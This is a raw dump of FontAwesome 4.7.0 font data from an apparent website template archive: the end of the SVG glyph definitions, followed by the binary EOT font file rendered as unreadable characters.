q7 37 7 90q0 102 -40 150q106 -103 101 -219q-1 -29 -15 -50t-27 -27l-13 -6q-4 -7 -19 -32t-26 -45.5t-26.5 -52t-25 -61t-17 -63t-6.5 -66.5t10 -63q-35 54 -37 80q-22 -24 -34.5 -39t-33.5 -42t-30.5 -46t-16.5 -41t-0.5 -38t25.5 -27q45 -25 144 64t190.5 221.5
t122.5 228.5q86 52 145 115.5t86 119.5q47 -93 154 -178q104 -83 167 -80q39 2 46 43zM1794 640q0 -182 -71 -348t-191 -286t-286.5 -191t-348.5 -71t-348.5 71t-286.5 191t-191 286t-71 348t71 348t191 286t286.5 191t348.5 71t348.5 -71t286.5 -191t191 -286t71 -348z" />
    <glyph glyph-name="uniF2D7" unicode="&#xf2d7;" 
d="M518 1353v-655q103 -1 191.5 1.5t125.5 5.5l37 3q68 2 90.5 24.5t39.5 94.5l33 142h103l-14 -322l7 -319h-103l-29 127q-15 68 -45 93t-84 26q-87 8 -352 8v-556q0 -78 43.5 -115.5t133.5 -37.5h357q35 0 59.5 2t55 7.5t54 18t48.5 32t46 50.5t39 73l93 216h89
q-6 -37 -31.5 -252t-30.5 -276q-146 5 -263.5 8t-162.5 4h-44h-628l-376 -12v102l127 25q67 13 91.5 37t25.5 79l8 643q3 402 -8 645q-2 61 -25.5 84t-91.5 36l-127 24v102l376 -12h702q139 0 374 27q-6 -68 -14 -194.5t-12 -219.5l-5 -92h-93l-32 124q-31 121 -74 179.5
t-113 58.5h-548q-28 0 -35.5 -8.5t-7.5 -30.5z" />
    <glyph glyph-name="uniF2D8" unicode="&#xf2d8;" 
d="M922 739v-182q0 -4 0.5 -15t0 -15l-1.5 -12t-3.5 -11.5t-6.5 -7.5t-11 -5.5t-16 -1.5v309q9 0 16 -1t11 -5t6.5 -5.5t3.5 -9.5t1 -10.5v-13.5v-14zM1238 643v-121q0 -1 0.5 -12.5t0 -15.5t-2.5 -11.5t-7.5 -10.5t-13.5 -3q-9 0 -14 9q-4 10 -4 165v7v8.5v9t1.5 8.5l3.5 7
t5 5.5t8 1.5q6 0 10 -1.5t6.5 -4.5t4 -6t2 -8.5t0.5 -8v-9.5v-9zM180 407h122v472h-122v-472zM614 407h106v472h-159l-28 -221q-20 148 -32 221h-158v-472h107v312l45 -312h76l43 319v-319zM1039 712q0 67 -5 90q-3 16 -11 28.5t-17 20.5t-25 14t-26.5 8.5t-31 4t-29 1.5
h-29.5h-12h-91v-472h56q169 -1 197 24.5t25 180.5q-1 62 -1 100zM1356 515v133q0 29 -2 45t-9.5 33.5t-24.5 25t-46 7.5q-46 0 -77 -34v154h-117v-472h110l7 30q30 -36 77 -36q50 0 66 30.5t16 83.5zM1536 1248v-1216q0 -66 -47 -113t-113 -47h-1216q-66 0 -113 47t-47 113
v1216q0 66 47 113t113 47h1216q66 0 113 -47t47 -113z" />
    <glyph glyph-name="uniF2D9" unicode="&#xf2d9;" horiz-adv-x="2176" 
d="M1143 -197q-6 1 -11 4q-13 8 -36 23t-86 65t-116.5 104.5t-112 140t-89.5 172.5q-17 3 -175 37q66 -213 235 -362t391 -184zM502 409l168 -28q-25 76 -41 167.5t-19 145.5l-4 53q-84 -82 -121 -224q5 -65 17 -114zM612 1018q-43 -64 -77 -148q44 46 74 68zM2049 584
q0 161 -62 307t-167.5 252t-250.5 168.5t-304 62.5q-147 0 -281 -52.5t-240 -148.5q-30 -58 -45 -160q60 51 143 83.5t158.5 43t143 13.5t108.5 -1l40 -3q33 -1 53 -15.5t24.5 -33t6.5 -37t-1 -28.5q-126 11 -227.5 0.5t-183 -43.5t-142.5 -71.5t-131 -98.5
q4 -36 11.5 -92.5t35.5 -178t62 -179.5q123 -6 247.5 14.5t214.5 53.5t162.5 67t109.5 59l37 24q22 16 39.5 20.5t30.5 -5t17 -34.5q14 -97 -39 -121q-208 -97 -467 -134q-135 -20 -317 -16q41 -96 110 -176.5t137 -127t130.5 -79t101.5 -43.5l39 -12q143 -23 263 15
q195 99 314 289t119 418zM2123 621q-14 -135 -40 -212q-70 -208 -181.5 -346.5t-318.5 -253.5q-48 -33 -82 -44q-72 -26 -163 -16q-36 -3 -73 -3q-283 0 -504.5 173t-295.5 442q-1 0 -4 0.5t-5 0.5q-6 -50 2.5 -112.5t26 -115t36 -98t31.5 -71.5l14 -26q8 -12 54 -82
q-71 38 -124.5 106.5t-78.5 140t-39.5 137t-17.5 107.5l-2 42q-5 2 -33.5 12.5t-48.5 18t-53 20.5t-57.5 25t-50 25.5t-42.5 27t-25 25.5q19 -10 50.5 -25.5t113 -45.5t145.5 -38l2 32q11 149 94 290q41 202 176 365q28 115 81 214q15 28 32 45t49 32q158 74 303.5 104
t302 11t306.5 -97q220 -115 333 -336t87 -474z" />
    <glyph glyph-name="uniF2DA" unicode="&#xf2da;" horiz-adv-x="1792" 
d="M1341 752q29 44 -6.5 129.5t-121.5 142.5q-58 39 -125.5 53.5t-118 4.5t-68.5 -37q-12 -23 -4.5 -28t42.5 -10q23 -3 38.5 -5t44.5 -9.5t56 -17.5q36 -13 67.5 -31.5t53 -37t40 -38.5t30.5 -38t22 -34.5t16.5 -28.5t12 -18.5t10.5 -6t11 9.5zM1704 178
q-52 -127 -148.5 -220t-214.5 -141.5t-253 -60.5t-266 13.5t-251 91t-210 161.5t-141.5 235.5t-46.5 303.5q1 41 8.5 84.5t12.5 64t24 80.5t23 73q-51 -208 1 -397t173 -318t291 -206t346 -83t349 74.5t289 244.5q20 27 18 14q0 -4 -4 -14zM1465 627q0 -104 -40.5 -199
t-108.5 -164t-162 -109.5t-198 -40.5t-198 40.5t-162 109.5t-108.5 164t-40.5 199t40.5 199t108.5 164t162 109.5t198 40.5t198 -40.5t162 -109.5t108.5 -164t40.5 -199zM1752 915q-65 147 -180.5 251t-253 153.5t-292 53.5t-301 -36.5t-275.5 -129t-220 -211.5t-131 -297
t-10 -373q-49 161 -51.5 311.5t35.5 272.5t109 227t165.5 180.5t207 126t232 71t242.5 9t236 -54t216 -124.5t178 -197q33 -50 62 -121t31 -112zM1690 573q12 244 -136.5 416t-396.5 240q-8 0 -10 5t24 8q125 -4 230 -50t173 -120t116 -168.5t58.5 -199t-1 -208
t-61.5 -197.5t-122.5 -167t-185 -117.5t-248.5 -46.5q108 30 201.5 80t174 123t129.5 176.5t55 225.5z" />
    <glyph glyph-name="uniF2DB" unicode="&#xf2db;" 
d="M192 256v-128h-112q-16 0 -16 16v16h-48q-16 0 -16 16v32q0 16 16 16h48v16q0 16 16 16h112zM192 512v-128h-112q-16 0 -16 16v16h-48q-16 0 -16 16v32q0 16 16 16h48v16q0 16 16 16h112zM192 768v-128h-112q-16 0 -16 16v16h-48q-16 0 -16 16v32q0 16 16 16h48v16
q0 16 16 16h112zM192 1024v-128h-112q-16 0 -16 16v16h-48q-16 0 -16 16v32q0 16 16 16h48v16q0 16 16 16h112zM192 1280v-128h-112q-16 0 -16 16v16h-48q-16 0 -16 16v32q0 16 16 16h48v16q0 16 16 16h112zM1280 1440v-1472q0 -40 -28 -68t-68 -28h-832q-40 0 -68 28
t-28 68v1472q0 40 28 68t68 28h832q40 0 68 -28t28 -68zM1536 208v-32q0 -16 -16 -16h-48v-16q0 -16 -16 -16h-112v128h112q16 0 16 -16v-16h48q16 0 16 -16zM1536 464v-32q0 -16 -16 -16h-48v-16q0 -16 -16 -16h-112v128h112q16 0 16 -16v-16h48q16 0 16 -16zM1536 720v-32
q0 -16 -16 -16h-48v-16q0 -16 -16 -16h-112v128h112q16 0 16 -16v-16h48q16 0 16 -16zM1536 976v-32q0 -16 -16 -16h-48v-16q0 -16 -16 -16h-112v128h112q16 0 16 -16v-16h48q16 0 16 -16zM1536 1232v-32q0 -16 -16 -16h-48v-16q0 -16 -16 -16h-112v128h112q16 0 16 -16v-16
h48q16 0 16 -16z" />
    <glyph glyph-name="uniF2DC" unicode="&#xf2dc;" horiz-adv-x="1664" 
d="M1566 419l-167 -33l186 -107q23 -13 29.5 -38.5t-6.5 -48.5q-14 -23 -39 -29.5t-48 6.5l-186 106l55 -160q13 -38 -12 -63.5t-60.5 -20.5t-48.5 42l-102 300l-271 156v-313l208 -238q16 -18 17 -39t-11 -36.5t-28.5 -25t-37 -5.5t-36.5 22l-112 128v-214q0 -26 -19 -45
t-45 -19t-45 19t-19 45v214l-112 -128q-16 -18 -36.5 -22t-37 5.5t-28.5 25t-11 36.5t17 39l208 238v313l-271 -156l-102 -300q-13 -37 -48.5 -42t-60.5 20.5t-12 63.5l55 160l-186 -106q-23 -13 -48 -6.5t-39 29.5q-13 23 -6.5 48.5t29.5 38.5l186 107l-167 33
q-29 6 -42 29t-8.5 46.5t25.5 40t50 10.5l310 -62l271 157l-271 157l-310 -62q-4 -1 -13 -1q-27 0 -44 18t-19 40t11 43t40 26l167 33l-186 107q-23 13 -29.5 38.5t6.5 48.5t39 30t48 -7l186 -106l-55 160q-13 38 12 63.5t60.5 20.5t48.5 -42l102 -300l271 -156v313
l-208 238q-16 18 -17 39t11 36.5t28.5 25t37 5.5t36.5 -22l112 -128v214q0 26 19 45t45 19t45 -19t19 -45v-214l112 128q16 18 36.5 22t37 -5.5t28.5 -25t11 -36.5t-17 -39l-208 -238v-313l271 156l102 300q13 37 48.5 42t60.5 -20.5t12 -63.5l-55 -160l186 106
q23 13 48 6.5t39 -29.5q13 -23 6.5 -48.5t-29.5 -38.5l-186 -107l167 -33q27 -5 40 -26t11 -43t-19 -40t-44 -18q-9 0 -13 1l-310 62l-271 -157l271 -157l310 62q29 6 50 -10.5t25.5 -40t-8.5 -46.5t-42 -29z" />
    <glyph glyph-name="uniF2DD" unicode="&#xf2dd;" horiz-adv-x="1792" 
d="M1473 607q7 118 -33 226.5t-113 189t-177 131t-221 57.5q-116 7 -225.5 -32t-192 -110.5t-135 -175t-59.5 -220.5q-7 -118 33 -226.5t113 -189t177.5 -131t221.5 -57.5q155 -9 293 59t224 195.5t94 283.5zM1792 1536l-349 -348q120 -117 180.5 -272t50.5 -321
q-11 -183 -102 -339t-241 -255.5t-332 -124.5l-999 -132l347 347q-120 116 -180.5 271.5t-50.5 321.5q11 184 102 340t241.5 255.5t332.5 124.5q167 22 500 66t500 66z" />
    <glyph glyph-name="uniF2DE" unicode="&#xf2de;" horiz-adv-x="1792" 
d="M948 508l163 -329h-51l-175 350l-171 -350h-49l179 374l-78 33l21 49l240 -102l-21 -50zM563 1100l304 -130l-130 -304l-304 130zM907 915l240 -103l-103 -239l-239 102zM1188 765l191 -81l-82 -190l-190 81zM1680 640q0 159 -62 304t-167.5 250.5t-250.5 167.5t-304 62
t-304 -62t-250.5 -167.5t-167.5 -250.5t-62 -304t62 -304t167.5 -250.5t250.5 -167.5t304 -62t304 62t250.5 167.5t167.5 250.5t62 304zM1792 640q0 -182 -71 -348t-191 -286t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71t348 -71
t286 -191t191 -286t71 -348z" />
    <glyph glyph-name="uniF2E0" unicode="&#xf2e0;" horiz-adv-x="1920" 
d="M1334 302q-4 24 -27.5 34t-49.5 10.5t-48.5 12.5t-25.5 38q-5 47 33 139.5t75 181t32 127.5q-14 101 -117 103q-45 1 -75 -16l-3 -2l-5 -2.5t-4.5 -2t-5 -2t-5 -0.5t-6 1.5t-6 3.5t-6.5 5q-3 2 -9 8.5t-9 9t-8.5 7.5t-9.5 7.5t-9.5 5.5t-11 4.5t-11.5 2.5q-30 5 -48 -3
t-45 -31q-1 -1 -9 -8.5t-12.5 -11t-15 -10t-16.5 -5.5t-17 3q-54 27 -84 40q-41 18 -94 -5t-76 -65q-16 -28 -41 -98.5t-43.5 -132.5t-40 -134t-21.5 -73q-22 -69 18.5 -119t110.5 -46q30 2 50.5 15t38.5 46q7 13 79 199.5t77 194.5q6 11 21.5 18t29.5 0q27 -15 21 -53
q-2 -18 -51 -139.5t-50 -132.5q-6 -38 19.5 -56.5t60.5 -7t55 49.5q4 8 45.5 92t81.5 163.5t46 88.5q20 29 41 28q29 0 25 -38q-2 -16 -65.5 -147.5t-70.5 -159.5q-12 -53 13 -103t74 -74q17 -9 51 -15.5t71.5 -8t62.5 14t20 48.5zM383 86q3 -15 -5 -27.5t-23 -15.5
q-14 -3 -26.5 5t-15.5 23q-3 14 5 27t22 16t27 -5t16 -23zM953 -177q12 -17 8.5 -37.5t-20.5 -32.5t-37.5 -8t-32.5 21q-11 17 -7.5 37.5t20.5 32.5t37.5 8t31.5 -21zM177 635q-18 -27 -49.5 -33t-57.5 13q-26 18 -32 50t12 58q18 27 49.5 33t57.5 -12q26 -19 32 -50.5
t-12 -58.5zM1467 -42q19 -28 13 -61.5t-34 -52.5t-60.5 -13t-51.5 34t-13 61t33 53q28 19 60.5 13t52.5 -34zM1579 562q69 -113 42.5 -244.5t-134.5 -207.5q-90 -63 -199 -60q-20 -80 -84.5 -127t-143.5 -44.5t-140 57.5q-12 -9 -13 -10q-103 -71 -225 -48.5t-193 126.5
q-50 73 -53 164q-83 14 -142.5 70.5t-80.5 128t-2 152t81 138.5q-36 60 -38 128t24.5 125t79.5 98.5t121 50.5q32 85 99 148t146.5 91.5t168 17t159.5 -66.5q72 21 140 17.5t128.5 -36t104.5 -80t67.5 -115t17.5 -140.5q52 -16 87 -57t45.5 -89t-5.5 -99.5t-58 -87.5z
M455 1222q14 -20 9.5 -44.5t-24.5 -38.5q-19 -14 -43.5 -9.5t-37.5 24.5q-14 20 -9.5 44.5t24.5 38.5q19 14 43.5 9.5t37.5 -24.5zM614 1503q4 -16 -5 -30.5t-26 -18.5t-31 5.5t-18 26.5q-3 17 6.5 31t25.5 18q17 4 31 -5.5t17 -26.5zM1800 555q4 -20 -6.5 -37t-30.5 -21
q-19 -4 -36 6.5t-21 30.5t6.5 37t30.5 22q20 4 36.5 -7.5t20.5 -30.5zM1136 1448q16 -27 8.5 -58.5t-35.5 -47.5q-27 -16 -57.5 -8.5t-46.5 34.5q-16 28 -8.5 59t34.5 48t58 9t47 -36zM1882 792q4 -15 -4 -27.5t-23 -16.5q-15 -3 -27.5 5.5t-15.5 22.5q-3 15 5 28t23 16
q14 3 26.5 -5t15.5 -23zM1691 1033q15 -22 10.5 -49t-26.5 -43q-22 -15 -49 -10t-42 27t-10 49t27 43t48.5 11t41.5 -28z" />
    <glyph glyph-name="uniF2E1" unicode="&#xf2e1;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="uniF2E2" unicode="&#xf2e2;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="uniF2E3" unicode="&#xf2e3;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="uniF2E4" unicode="&#xf2e4;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="uniF2E5" unicode="&#xf2e5;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="uniF2E6" unicode="&#xf2e6;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="uniF2E7" unicode="&#xf2e7;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="_698" unicode="&#xf2e8;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="uniF2E9" unicode="&#xf2e9;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="uniF2EA" unicode="&#xf2ea;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="uniF2EB" unicode="&#xf2eb;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="uniF2EC" unicode="&#xf2ec;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="uniF2ED" unicode="&#xf2ed;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="uniF2EE" unicode="&#xf2ee;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="lessequal" unicode="&#xf500;" horiz-adv-x="1792" 
 />
  </font>
</defs></svg>
PKԜ�\Op�n�n�;purity_iii/fonts/font-awesome/fonts/fontawesome-webfont.eotnu&1i�n����LPYxϐFontAwesomeRegular$Version 4.7.0 2016FontAwesome
�PFFTMk�G���GDEF��p OS/2�2z@X`cmap
�:��gasp���hglyf���M�L�head��-�6hhea
�$hmtxEy��
�loca��\�maxp,8 name㗋�gh�post����k�uː�xY_<��3�2�3�2���	�	����	��'@i��3��3s�pyrs@ �� �pU�]�����y�n�����2��@������
��������z���Z@�5�5
���z���ZZ����@���������,_���@������s���@	��@��(������@�����@��@-
�M�M�-�
�M�M�����@�����@@�
�-����`��b����
���$����6�4�8�"�"""""���@�D@���,,@� ���������	m��)@�@	 	' D9>dY*	'						�	��	��T										�@	f�	%RE	 		$!k(D�'	��	�%��	�%	��	��0%�/�&��p@0 �����!"""`���>�N�^�n�~��������������.�>�N�^�n�~��������������>�N�^�n�~������������ �����!"""`���!�@�P�`�p�������������� �0�@�P�`�p��������������!�@�P�`�p�������������\�X�S�B�1����ݬ

	����������������������������������
�
	,,,,,,,,,,,,,��t�L�T$�l	x	�
T(��
d����l,����4d�pH�$d,t( � �!�"0# $,$�&D'�(�)T**�,,�-�.@.�/`/�00�1�2�3d444�5 5�5�6 6\6�7H7�88`8�9L9�:h:�;�<p=p><>�?h?�@H@�A0A�BXB�CdC�DLD�E�F�G0G�H�I�J8K�L�MdN,N�N�O�P`P�Q4Q�RRlS,S�T`U0W�X�Z[@[�\<\�]�^(^�_�`pb,b�dd�ePe�f�g`g�iLi�jDkk�l�m@n,oLp�q�r�sxtt�uD{`||�}}�~��������H��������l�@����������l�H� ���T��H�������`����@�����$�\�X��D�������T�X�����D�P�,���8���d�\����������������H���x��� �t���X���p��d��������x�t�������������@������Œ�\� ļ�ŸƔ�0���d��ʨˀ����͔�x��ϰЌ�,ш�҈�ӌ���8�,՜�`���l�Hش�`���Tڸ�۔�@���l��ބ�߬��l�p� ������������������������������4�����X���$�l���(����`����������	d

��
,�,��8��(�X���x|T�@��| �!�"x##l$$�'h(�*L,T.L1t1�2�303�4�5t6T7$89H::�;�<�<�?X@A�B�C�D�EHFHGpHHIxJ J�K�L�MN@P@Q�R�SDT ULV`V�WXX4X�ZZ�[d[�\|]�^�`�aHa�b�cXd�etfhg�h�i\jxn�p@s�vw�x�y�z�{h|�}}�\���l�t���4���������t���8�8���L���T�������������|�������|�������4�x�����L����������X�(� ������� ������@�����l���t����$����x�L�L��� �H������Ġ�T�(����ʈˠ��ϔ�l�d���P�Մ�x�p���ڬ�T�T���ވ�L�����<�H��$���l������4����������� �P�l����,���x���p�,�x�t��d����4���4,h�P	4
��
�4�<,,408$�8�T� |!h"�$L%0&H'�(�)�*0*�+�,�.$.�0�1�2@2�3�4t5$6�9 :�:�;;�<(<�=4?�@�A�C�D�F�H`H�I�L�L�L�L�L�L�L�L�L�L�L�L�L�L�L�L�p7!!!���@p�p �p�]���!2#!"&463!&54>3!2�+��@&&��&&@��+$(�($F#+���&4&&4&x+#��+".4>32".4>32467632DhgZghDDhg-iW�DhgZghDDhg-iW&@(8 ��2N++NdN+'�;2N++NdN+'�3
8���!  #"'#"$&6$ �������rL46$���܏���oo��o|W%r��������4L&V|o��oo����ܳ��%��=M%+".'&%&'3!26<.#!";2>767>7#!"&5463!2� %��3@m00m@3���% 
�
�@
���:"7..7":�6]�^B�@B^^B�B^ $΄+0110+��$�
(	

�t��1%%1��+�`��B^^B@B^^���"'.54632>32�4��
#L</��>�oP$$Po�>���Z$_d�C�+I@$$@I+��������"#"'%#"&547&547%62���V�?�?V��8��<��8y���
���b%	I�))�9I	����	+	%%#"'%#"&547&547%62q2�Z���Z2Izy���V)�?�?V��8��<��8)>~��>��[��
���
2���b%	I�))�9I	���%#!"&54>3 72 &6 }X��X}.GuL�l�LuG.�����>�m��mU��mE��Em�������>����/?O_o���54&+";2654&+";2654&+";264&#!"3!2654&+";2654&+";264&#!"3!2654&+";2654&+";2654&+";267#!"&5463!2�&�&&�&&�&&�&&�&&�&&�&&&�&�&&�&�&�&&�&��&�&&&�&�&&�&&�&&�&&�&&�&�^B��B^^B@B^@�&&�&&��&&�&&��&&�&&�&&�&&��&&�&&���&&�&&&&�&&���&&�&&��&&�&&��&&�&&���B^^B@B^^��/?#!"&5463!2#!"&5463!2#!"&5463!2#!"&5463!2L4�4LL44LL4�4LL44L�L4�4LL44LL4�4LL44L��4LL4�4LL��4LL4�4LL���4LL4�4LL��4LL4�4LL	�/?O_o�#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!28(��(88(@(88(��(88(@(8�8(��(88(@(8��8(��(88(@(8�8(��(88(@(8�8(��(88(@(8��8(��(88(@(8�8(��(88(@(88(��(88(@(8 �(88(�(88�(88(�(88��(88(�(88�(88(�(88��(88(�(88��(88(�(88�(88(�(88��(88(�(88�(88(�(88�/?O_#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!28(��(88(@(88(��(88(@(88(�@(88(�(8�8(��(88(@(88(�@(88(�(88(�@(88(�(8 �(88(�(88�(88(�(88��(88(�(88�(88(�(88��(88(�(88�(88(�(88y��"/&4?62	62��,�P����P&�P��P�,��jP�����n���#$"'	"/&47	&4?62	62	�P���P�&���P&&P���&�P�&���P&&P���&�P������#+D++"&=#"&=46;546;232  #"'#"$&6$ 
�
@
�

�
@
�
�������rK56$���܏���oo��o|W�@
�

�
@
�

��r��������jK&V|o��oo����ܳ�����0#!"&=463!2  #"'#"$&6$ 
��

@
�������rK56$���܏���oo��o|W�@

@
�r��������jK&V|o��oo����ܳ����)5 $&54762>54&'.7>"&5462z�����z��+i *bkQ��н�Qkb* j*����LhLLhL�����zz���Bm +*i J�yh��QQ��hy�J i*+ m��J��4LL4�4LL���/?O%+"&=46;2%+"&546;2%+"&546;2+"&546;2+"&546;2��������������`��r��@�@r�@��@����n4&"2#"/+"&/&'#"'&'&547>7&/.=46?67&'&547>3267676;27632�Ԗ����#H
	��,/
�1)�
~'H�
�(C
	�

�,/
�1)�	
�$H�
Ԗ�Ԗm�6%2X
%�	l�2
�k	r6

[21
�..9Q

$�
k�2
�k	
w3[20����/;Cg+"&546;2+"&546;2+"&546;2!3!2>!'&'!+#!"&5#"&=463!7>3!2!2@@@@@@���@�`�0
��
o`^B��B^`5FN(@(NF5 ��@��@��@���L%%Ju		�@�LSyuS�@�%44%�f5#!!!"&5465	7#"'	'&/&6762546;2�&�����&??�>

�L�L
>
� X ���
 � &���&��&AJ	A��	J
W���h��##!"&5463!2!&'&!"&5!�(8(��(88(�(`�x
��c�`(8��`(��(88(@(8(D��9�8(����� ,#!"&=46;46;2.  6 $$ ����@��������(�r���^����a�a�@@`��(��������_�^����a�a��2NC5.+";26#!26'.#!"3!"547>3!";26/.#!2W
�
��.�@

��

�@.�$S

�

S$�@

���9I


�
I6>
��
��>�%=$4&"2$4&"2#!"&5463!2?!2"'&763!463!2!2&4&&4&&4&&4�8(�@(88(ч:�:��(8���@6�@*&&*�4&&4&&4&&4& ��(88(@(8�88�8)�@�)'�&&�@���$0"'&76;46;232  >& $$ `
������������(���r���^����a�a`��		@`��2�������(���^����a�a�����$0++"&5#"&54762  >& $$ ^���
?@�����(���r���^����a�a���`?		����������(���^����a�a��
#!.'!!!%#!"&547>3!2�<�<�<_@`&��&�
5@5
�@����&&�>=(""��=���'#"'&5476.  6 $$ � ��  ! ��������(�r���^����a�a�J��	%�%���(��������_�^����a�a�����3#!"'&?&#"3267672#"$&6$3276&�@*���h��QQ��hw�I
�	m�ʬ����zz���k�)'�@&('��Q��н�Qh_
	�
��z�8�zoe����$G!"$'"&5463!23267676;2#!"&4?&#"+"&=!2762�@�h���k�4&&�&�G�a��F*�
&�@&��Ɇ�F*�
A��k�4&���nf�&�&&4�BH�rd�@&&4���rd
Moe�&�/?O_o+"&=46;25+"&=46;25+"&=46;2#!"&=463!25#!"&=463!25#!"&=463!24&#!"3!26#!"&5463!2�
@

@

@

@

@

@
�
�@

�

�@

�

�@

�
�
�@

�
�^B�@B^^B�B^`@

@
�@

@
�@

@
��@

@
�@

@
�@

@
�3@

��
M��B^^B@B^^��!54&"#!"&546;54 32@�Ԗ@8(�@(88( p (8�j��j��(88(@(8������8@���7+"&5&5462#".#"#"&5476763232>32@@
@
@KjK�ך=}\�I���&:�k�~&26]S
&H&�

�&H5KKu�t,4,�	&� x:;*4*&��K#+"&546;227654$ >3546;2+"&="&/&546$ �<��X@@Gv"D�����װD"vG@@X��<��4L4����1!Sk @ G<_b������b_<G �� kS!1����zz�� �"'!"&5463!62&4����&&M4&���&M&�&M& ��-"'!"&5463!62#"&54>4.54632&4����&&M4&�UF
&""""&
F���&M&�&M&���%/B/%���G-Ik"'!"&5463!62#"&54>4.54632#"&54767>4&'&'&54632#"&547>7676'&'.'&54632&4����&&M4&�UF
&""""&
FU��
&'8JSSJ8'&

����

&'.${��{$.'&

����&M&�&M&���%/B/%7���;&'6���6'&;��4�[&$
[2[
$&[��#/37#5#5!#5!!!!!!!#5!#5!5##!35!!!����������������������������������������������������������������������������#'+/37;?3#3#3#3#3#3#3#3#3#3#3#3#3#3#3#3#3????  ^��>>~??�??�??~??~??^??�^^?  ^??������������������������������������4&"2#"'.5463!2�KjKKjv%�'45%�5&5L4�5�&�%jKKjK�@5%�%%�%�5�4L5&�6'��k�54&"2#"'.5463!2#"&'654'.#32�KjKKjv%�'45%�5&5L4�5�&�%�%�'4$.�%%�5&�5�5�&�%jKKjK�@5%�%%�%�5�4L5&�6'45%�%�%54'�&55&�6'
��y�Tdt#!"&'&74676&7>7>76&7>7>76&7>7>76&7>7>63!2#!"3!2676'3!26?6&#!"3!26?6&#!"g(��sA�eM�,*$/
!'&
�JP��$G]��
x�6,&��`
��
h`
��
"9H�v@WkNC<.
&k&
("$p"	.
#u&#	%!'	pJ�vwEF�#

@

��

@

���2#"'	#"'.546763�!''!0#�G�G$/!''!�	
8"��"8
 ��X!	
8"	"8
	����<)!!#"&=!4&"27+#!"&=#"&546;463!232������(8���&4&&4�
�8(�@(8�
qO@8(�(`�(@Oq��8(��&4&&4&@�`
�(88(�
�Oq (8(�`(�q���!)2"&42#!"&546;7>3!2  I��j��j��j��j�3e55e3�gr������`��I�j��j��j�j��1GG1���r��������P2327&7>7;"&#"4?2>54.'%3"&#"#ժ!�9&W��B03&�K5�!�)V�?�@L��'�	
>R�>e;&L:�:%P�>��vO
'h�� N��_"�:-&+#
��:��	'	����+a%3 4'.#"32>54.#"7>7><5'./6$3232#"&#"+JBx)EB_I:I*CRzb3:dtB2P���$$5.3b�ZF�|\8!-T>5��Fu��\,�,j�n OrB,<!
5�4wJ]�?tTFi;
2�3j.�p^%/2�+
	S:T}K4W9: #ƕd�fE���:7>7676'5.'732>7"#"&#&#"OA
zj=N!�}:0e��%	y�
+t�D3�~U#B4#
g		'2
%/!:
���T	bRU,7����}%2"/&6;#"&?62+326323!2>?23&'.'.#"&"$#"#&=>764=464.'&#"&'�!~:~!PP!~:~!P��6�,�,$�$%*'
c2N 	
(�$"L��A2�3Yl�!x!*�%��%%��%��
p�P,T	NE	Q7^���oH!+(
3	 *Ue�eu
wg��a�32632$?23&'.5&'&#"&"5$#"#&=>7>4&54&54>.'&#"&'2#".465!#".'&47>32!4&4>Q6�,�,Faw!*'
=~Pl*	
(�$"L��A2�3Yl	�)�!*<7@@7<
�
<7@@7<
 p�P,T	MF
Q7�47ƢHoH!+(
3	 t���JHQ6wh��',686,'$##$',686,'$##$�/?%#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2&��&&�&��&�&&&&�&&&��&��&&�&��&&�&&f�&&�&&f�&&�&&f�&&�&&�/?%#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2&��&&�&��&��&&�&&��&&�&��&��&&�&��&&�&&f�&&�&&f�&&�&&f�&&�&&�/?%#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2&��&&�&&�&&&&�&&&&��&&�&��&&�&&f�&&�&&f�&&�&&f�&&�&&�/?%#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2&��&&�&&��&&�&&��&&�&&��&&�&��&&�&&f�&&�&&f�&&�&&f�&&�&&�/?O_o%+"&=46;2+"&=46;2+"&=46;2#!"&=463!2+"&=46;2#!"&=463!2#!"&=463!2#!"&=463!2
�

�

�

�

�

�

��

@
�
�

�

��

@

��

@

��

@
�

�
s�

�
s�

�
��

�
s�

�
��

�
s�

�
s�

�
�/?O#"'&47632#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2�
	��		 	
�
�@

�

��

@

��

@

�@

�
�
	 		 	��

�
s�

�
s�

�
s�

�
�/?O#"&54632	#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2`	��	

	 �
�@

�

��

@

��

@

�@

�
�	��	
@
	��	�

�
s�

�
s�

�
s�

�
#"'#!"&5463!2632'
�m�w�@w��w�w��
'���*��w��w�w��w������."&462!5	!"3!2654&#!"&5463!2�p�pp�p��@���

@
�^B��B^^B@B^�pp�p���@�@� 
�@

�
 �@B^^B�B^^���k%!7'34#"3276'	!7632k[�[�v
��
6����`�%��`�$65&�%[�[k����
�`����5%���&&�'���4&"2"&'&54 �Ԗ���!��?H?��!,�,Ԗ�ԖmF��!&&!Fm�,�����%" $$ ���������^����a�a`@������^����a�a���-4'.'&"26% 547>7>2"KjK��X��QqYn	243nYqQ�$!+!77!+!$5KK���,ԑ�	���]""]ً�	��9>H7'3&7#!"&5463!2'&#!"3!26=4?6	!762xt�t` �� ^Q�w��w��w@?61��B^^B@B^	@(` �`��\\��\P�`t�t8`� �� ^�Ͼw��w@w�1^B��B^^B~
	@��` \ \�P�+Z#!"&5463!12+"3!26=47676#"'&=# #"'.54>;547632��w��w��w�
M8
pB^^B@B^�
'���sw-

9*##;No��j�'
�#��w��w@w�
"^B��B^^B�

	��*�����
